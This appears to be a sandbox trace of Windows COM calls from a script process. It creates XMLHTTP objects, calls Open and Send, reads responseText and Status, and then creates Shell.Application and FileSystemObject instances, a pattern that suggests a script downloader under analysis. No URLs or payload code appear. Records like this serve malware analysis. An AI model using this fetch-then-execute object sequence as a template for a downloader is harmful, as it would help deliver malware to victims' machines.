	[0612.192] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.192] SysStringLen (param_1=0x0) returned 0x0
	[0612.192] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.192] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0612.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0612.192] ??2@YAPEAX_K@Z () returned 0x62f330
	[0612.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0612.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.192] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0612.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0612.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0612.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.193] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.193] longjmp () 
	[0612.193] longjmp () 
	[0612.193] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.193] SysStringLen (param_1=0x0) returned 0x0
	[0612.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0612.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0612.194] ??2@YAPEAX_K@Z () returned 0x62f310
	[0612.194] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0612.194] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.194] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0612.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0612.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0612.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.194] longjmp () 
	[0612.194] longjmp () 
	[0612.194] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.194] SysStringLen (param_1=0x0) returned 0x0
	[0612.195] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.195] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0612.195] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0612.195] ??2@YAPEAX_K@Z () returned 0x62f330
	[0612.195] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.195] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0612.195] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.196] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0612.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0612.859] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0612.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0612.859] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0612.860] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0612.860] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0612.860] SysStringLen (param_1=0x0) returned 0x0
	[0612.860] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0612.860] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0612.860] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0612.860] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0612.860] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0612.860] ??2@YAPEAX_K@Z () returned 0x62f350
	[0612.860] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0612.860] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0612.861] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0612.861] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0612.861] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0612.861] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0612.861] SysStringLen (param_1=0x0) returned 0x0
	[0612.861] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0612.864] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0612.864] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0612.864] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0612.865] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0612.865] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0612.865] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0619.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0619.988] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0619.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0619.989] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.989] SysStringLen (param_1=0x0) returned 0x0
	[0619.989] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.990] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0619.990] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0619.990] ??2@YAPEAX_K@Z () returned 0x62f330
	[0619.990] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0619.990] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0619.990] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0619.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0619.990] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0619.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0619.990] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0619.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
